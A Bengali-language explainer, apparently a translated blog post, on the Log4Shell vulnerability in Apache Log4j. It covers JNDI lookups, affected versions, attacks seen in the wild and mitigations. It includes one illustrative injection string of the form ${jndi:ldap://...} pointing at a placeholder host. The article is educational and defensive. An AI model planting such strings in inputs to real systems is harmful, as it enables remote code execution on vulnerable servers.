সুচিপত্র[লুকান][দেখান]
2021 সালের নভেম্বরের শেষের দিকে, আমরা সাইবার নিরাপত্তার জন্য একটি বড় হুমকি উন্মোচন করেছি। এই শোষণ বিশ্বব্যাপী লক্ষ লক্ষ কম্পিউটার সিস্টেমকে সম্ভাব্যভাবে প্রভাবিত করবে।
এটি Log4j দুর্বলতা এবং কীভাবে একটি উপেক্ষিত ডিজাইনের ত্রুটি বিশ্বের 90% এর বেশি কম্পিউটার পরিষেবাগুলিকে আক্রমণের জন্য উন্মুক্ত রেখেছিল তার একটি নির্দেশিকা৷
Apache Log4j হল একটি ওপেন সোর্স জাভা-ভিত্তিক লগিং ইউটিলিটি যা Apache Software Foundation দ্বারা তৈরি করা হয়েছে। মূলত 2001 সালে Ceki Gülcü দ্বারা লেখা, এটি এখন Apache Logging Services, Apache Software Foundation এর একটি প্রকল্পের অংশ।
বিশ্বজুড়ে কোম্পানিগুলি তাদের অ্যাপ্লিকেশনগুলিতে লগিং সক্ষম করতে Log4j লাইব্রেরি ব্যবহার করে৷ আসলে, জাভা লাইব্রেরিটি এতই সর্বব্যাপী, আপনি এটি অ্যামাজন, মাইক্রোসফ্ট, গুগল এবং আরও অনেক কিছুর অ্যাপ্লিকেশনগুলিতে খুঁজে পেতে পারেন।
লাইব্রেরির বিশিষ্টতার মানে হল যে কোডের যেকোনো সম্ভাব্য ত্রুটি লক্ষ লক্ষ কম্পিউটার হ্যাকিংয়ের জন্য উন্মুক্ত রাখতে পারে। 24শে নভেম্বর 2021 এ, ক মেঘ সুরক্ষা আলিবাবার জন্য কাজ করা গবেষক একটি ভয়ানক ত্রুটি আবিষ্কার করেছেন।
Log4j দুর্বলতা, যা Log4Shell নামেও পরিচিত, 2013 সাল থেকে অলক্ষিত ছিল। দুর্বলতা ক্ষতিকারক অভিনেতাদের Log4j চলমান প্রভাবিত সিস্টেমে কোড চালানোর অনুমতি দেয়। এটি 9 ই ডিসেম্বর, 2021-এ সর্বজনীনভাবে প্রকাশ করা হয়েছিল
শিল্প বিশেষজ্ঞরা Log4Shell ত্রুটিটিকে বলছেন সাম্প্রতিক স্মৃতিতে সবচেয়ে বড় দুর্বলতা.
দুর্বলতা প্রকাশের পরের সপ্তাহে, সাইবার নিরাপত্তা দল লক্ষ লক্ষ আক্রমণ সনাক্ত করেছে। কিছু গবেষক এমনকি প্রতি মিনিটে একশোর বেশি আক্রমণের হার পর্যবেক্ষণ করেছেন।
এটা কিভাবে কাজ করে?
Log4Shell কেন এত বিপজ্জনক তা বোঝার জন্য, এটি কী করতে সক্ষম তা আমাদের বুঝতে হবে।
Log4Shell দুর্বলতা স্বেচ্ছাচারী কোড সম্পাদনের অনুমতি দেয়, যার মূলত অর্থ হল যে একজন আক্রমণকারী একটি লক্ষ্য মেশিনে যে কোনও কমান্ড বা কোড চালাতে পারে।
এটা কিভাবে এটা সম্পন্ন করে?
প্রথমত, আমাদের বুঝতে হবে JNDI কী।
জাভা নামকরণ এবং ডিরেক্টরি ইন্টারফেস (JNDI) হল একটি জাভা পরিষেবা যা জাভা প্রোগ্রামগুলিকে একটি নামের মাধ্যমে ডেটা এবং সংস্থানগুলি আবিষ্কার করতে এবং সন্ধান করতে দেয়। এই ডিরেক্টরি পরিষেবাগুলি গুরুত্বপূর্ণ কারণ তারা অ্যাপ্লিকেশন তৈরি করার সময় বিকাশকারীদের সহজেই উল্লেখ করার জন্য রেকর্ডের একটি সংগঠিত সেট সরবরাহ করে।
JNDI একটি নির্দিষ্ট ডিরেক্টরি অ্যাক্সেস করতে বিভিন্ন প্রোটোকল ব্যবহার করতে পারে। এই প্রোটোকলগুলির মধ্যে একটি হল লাইটওয়েট ডিরেক্টরি অ্যাক্সেস প্রোটোকল, বা LDAP।
একটি স্ট্রিং লগিং করার সময়, log4j যখন তারা ফর্মের অভিব্যক্তির সম্মুখীন হয় তখন স্ট্রিং প্রতিস্থাপন করে ${prefix:name}
.
উদাহরণ স্বরূপ, Text: ${java:version}
টেক্সট হিসাবে লগ করা হতে পারে: জাভা সংস্করণ 1.8.0_65। এই ধরণের প্রতিস্থাপনগুলি সাধারণ।
আমরা যেমন অভিব্যক্তি থাকতে পারে Text: ${jndi:ldap://example.com/file}
যা LDAP প্রোটোকলের মাধ্যমে একটি URL থেকে একটি জাভা অবজেক্ট লোড করতে JNDI সিস্টেম ব্যবহার করে।
এটি কার্যকরভাবে সেই URL থেকে মেশিনে আসা ডেটা লোড করে। যেকোনো সম্ভাব্য হ্যাকার একটি সর্বজনীন URL-এ দূষিত কোড হোস্ট করতে পারে এবং লগ 4j ব্যবহার করে মেশিনের জন্য অপেক্ষা করতে পারে।
যেহেতু লগ বার্তাগুলির বিষয়বস্তু ব্যবহারকারী-নিয়ন্ত্রিত ডেটা ধারণ করে, হ্যাকাররা তাদের নিজস্ব JNDI রেফারেন্স সন্নিবেশ করতে পারে যা তাদের নিয়ন্ত্রণ করে এমন LDAP সার্ভারের দিকে নির্দেশ করে। এই LDAP সার্ভারগুলি ক্ষতিকারক জাভা বস্তুতে পূর্ণ হতে পারে যা JNDI দুর্বলতার মাধ্যমে কার্যকর করতে পারে।
এটিকে আরও খারাপ করে তোলে যে অ্যাপ্লিকেশনটি সার্ভার-সাইড বা ক্লায়েন্ট-সাইড অ্যাপ্লিকেশন কিনা তা বিবেচ্য নয়।
যতক্ষণ লগার আক্রমণকারীর দূষিত কোড পড়ার জন্য একটি উপায় আছে, অ্যাপ্লিকেশনটি এখনও শোষণের জন্য উন্মুক্ত।
কে প্রভাবিত হয়?
দুর্বলতা সমস্ত সিস্টেম এবং পরিষেবাগুলিকে প্রভাবিত করে যা APache Log4j ব্যবহার করে, সংস্করণ 2.0 পর্যন্ত এবং 2.14.1 সহ।
বেশ কিছু নিরাপত্তা বিশেষজ্ঞ পরামর্শ দিয়েছেন যে দুর্বলতা জাভা ব্যবহার করে বেশ কয়েকটি অ্যাপ্লিকেশনকে প্রভাবিত করতে পারে।
ত্রুটিটি প্রথম মাইক্রোসফ্টের মালিকানাধীন মাইনক্রাফ্ট ভিডিও গেমে আবিষ্কৃত হয়েছিল। মাইক্রোসফ্ট তাদের ব্যবহারকারীদের জাভা সংস্করণ Minecraft সফ্টওয়্যার আপগ্রেড করার জন্য অনুরোধ করেছে কোনো ঝুঁকি এড়াতে।
সাইবারসিকিউরিটি অ্যান্ড ইনফ্রাস্ট্রাকচার সিকিউরিটি এজেন্সি (সিআইএসএ) এর পরিচালক জেন ইস্টারলি বলেছেন যে বিক্রেতাদের একটি প্রধান দায়িত্ব দূষিত অভিনেতা এই দুর্বলতা শোষণ থেকে শেষ ব্যবহারকারীদের প্রতিরোধ করতে.
"বিক্রেতাদের তাদের গ্রাহকদের সাথেও যোগাযোগ করা উচিত যাতে শেষ-ব্যবহারকারীরা জানেন যে তাদের পণ্যটিতে এই দুর্বলতা রয়েছে এবং সফ্টওয়্যার আপডেটগুলিকে অগ্রাধিকার দেওয়া উচিত।"
ইতিমধ্যেই হামলা শুরু হয়েছে বলে জানা গেছে। সাইবারসিকিউরিটি সফ্টওয়্যার সরবরাহ করে এমন একটি সংস্থা সিম্যানটেক, বিভিন্ন আক্রমণের অনুরোধগুলি পর্যবেক্ষণ করেছে৷
এখানে আক্রমণের ধরনগুলির কিছু উদাহরণ রয়েছে যা গবেষকরা সনাক্ত করেছেন:
- botnets
বটনেট হল কম্পিউটারের একটি নেটওয়ার্ক যা একটি একক আক্রমণকারী পক্ষের নিয়ন্ত্রণে থাকে। তারা DDoS আক্রমণ করতে, ডেটা চুরি করতে এবং অন্যান্য স্ক্যাম করতে সাহায্য করে। গবেষকরা Log4j শোষণ থেকে ডাউনলোড করা শেল স্ক্রিপ্টে মুহস্টিক বটনেট পর্যবেক্ষণ করেছেন।
- XMRig মাইনার ট্রোজান
XMRig হল একটি ওপেন সোর্স ক্রিপ্টোকারেন্সি মাইনার যেটি Monero টোকেন মাইন করতে CPU ব্যবহার করে। সাইবার অপরাধীরা মানুষের ডিভাইসে XMRig ইনস্টল করতে পারে যাতে তারা তাদের অজান্তেই তাদের প্রক্রিয়াকরণ শক্তি ব্যবহার করতে পারে।
- খন্সারি র্যানসমওয়্যার
Ransomware বলতে ডিজাইন করা ম্যালওয়্যারের একটি ফর্মকে বোঝায় ফাইল এনক্রিপ্ট করুন একটি কম্পিউটারে. আক্রমণকারীরা তারপর এনক্রিপ্ট করা ফাইলগুলিতে অ্যাক্সেস দেওয়ার বিনিময়ে অর্থপ্রদানের দাবি করতে পারে। গবেষকরা Log4Shell আক্রমণে খন্সারি র্যানসমওয়্যার আবিষ্কার করেছেন। তারা উইন্ডোজ সার্ভারকে টার্গেট করে এবং .NET ফ্রেমওয়ার্ক ব্যবহার করে।
এরপরে কি হবে?
বিশেষজ্ঞরা ভবিষ্যদ্বাণী করেছেন যে Log4J দুর্বলতা দ্বারা সৃষ্ট বিশৃঙ্খলা পুরোপুরি ঠিক করতে কয়েক মাস বা এমনকি বছরও লাগতে পারে।
এই প্রক্রিয়াটির সাথে প্রতিটি প্রভাবিত সিস্টেমকে একটি প্যাচ করা সংস্করণের সাথে আপডেট করা জড়িত। এমনকি যদি এই সমস্ত সিস্টেমগুলি প্যাচ করা হয়, তবুও সম্ভাব্য পিছনের দরজার ঝুঁকি রয়েছে যা হ্যাকাররা ইতিমধ্যেই উইন্ডোতে যোগ করেছে যে সার্ভারগুলি আক্রমণের জন্য খোলা ছিল।
অনেক সমাধান এবং প্রশমন এই বাগ দ্বারা শোষণ করা থেকে অ্যাপ্লিকেশন প্রতিরোধ করার জন্য বিদ্যমান. নতুন Log4j সংস্করণ 2.15.0-rc1 এই দুর্বলতা কমাতে বিভিন্ন সেটিংস পরিবর্তন করেছে।
JNDI ব্যবহার করে সমস্ত বৈশিষ্ট্য ডিফল্টরূপে অক্ষম করা হবে এবং দূরবর্তী লুকআপগুলিও সীমাবদ্ধ করা হয়েছে। আপনার Log4j সেটআপে লুকআপ বৈশিষ্ট্য অক্ষম করা সম্ভাব্য শোষণের ঝুঁকি হ্রাস করতে সহায়তা করবে৷
Log4j এর বাইরে, ওপেন সোর্স শোষণ প্রতিরোধ করার জন্য এখনও একটি বিস্তৃত পরিকল্পনার প্রয়োজন রয়েছে।
এর আগে মে মাসে হোয়াইট হাউস একটি প্রকাশ করেছে নির্বাহী আদেশ যার লক্ষ্য ছিল জাতীয় সাইবার নিরাপত্তা উন্নত করা। এটিতে একটি সফ্টওয়্যার বিল অফ ম্যাটেরিয়ালস (SBOM) এর একটি বিধান অন্তর্ভুক্ত ছিল যা মূলত একটি আনুষ্ঠানিক নথি ছিল যাতে অ্যাপ্লিকেশনটি তৈরি করার জন্য প্রয়োজনীয় প্রতিটি আইটেমের একটি তালিকা থাকে।
এই যেমন অংশ অন্তর্ভুক্ত ওপেন সোর্স উন্নয়নের জন্য ব্যবহৃত প্যাকেজ, নির্ভরতা এবং API যদিও এসবিওএম-এর ধারণা স্বচ্ছতার জন্য সহায়ক, তা কি সত্যিই ভোক্তাদের সাহায্য করবে?
নির্ভরতা আপগ্রেড করা খুব বেশি ঝামেলার হতে পারে। কোম্পানিগুলি বিকল্প প্যাকেজ খোঁজার জন্য অতিরিক্ত সময় নষ্ট করার ঝুঁকির পরিবর্তে যেকোনো জরিমানা দিতে বেছে নিতে পারে। সম্ভবত এই SBOMs শুধুমাত্র দরকারী হবে যদি তাদের সুযোগ আরও সীমাবদ্ধ।
উপসংহার
Log4j সমস্যাটি প্রতিষ্ঠানের জন্য শুধু একটি প্রযুক্তিগত সমস্যা নয়।
ব্যবসায়ী নেতাদের অবশ্যই তাদের সার্ভার, পণ্য বা পরিষেবাগুলি এমন কোডের উপর নির্ভর করে যা তারা নিজেরাই বজায় রাখে না তখন ঘটতে পারে এমন সম্ভাব্য ঝুঁকি সম্পর্কে সচেতন হতে হবে।
ওপেন সোর্স এবং তৃতীয় পক্ষের অ্যাপ্লিকেশনের উপর নির্ভর করা সবসময় কিছু ঝুঁকি নিয়ে আসে। নতুন হুমকি সামনে আসার আগে কোম্পানিগুলোর ঝুঁকি প্রশমনের কৌশল নিয়ে কাজ করা উচিত।
বেশিরভাগ ওয়েব বিশ্বব্যাপী হাজার হাজার স্বেচ্ছাসেবকদের দ্বারা পরিচালিত ওপেন সোর্স সফ্টওয়্যারের উপর নির্ভর করে।
আমরা যদি ওয়েবকে একটি নিরাপদ জায়গা রাখতে চাই, সরকার এবং কর্পোরেশনগুলিকে ওপেন সোর্স প্রচেষ্টা এবং সাইবার নিরাপত্তা সংস্থাগুলির অর্থায়নে বিনিয়োগ করা উচিত যেমন CISA.
নির্দেশিকা সমন্ধে মতামত দিন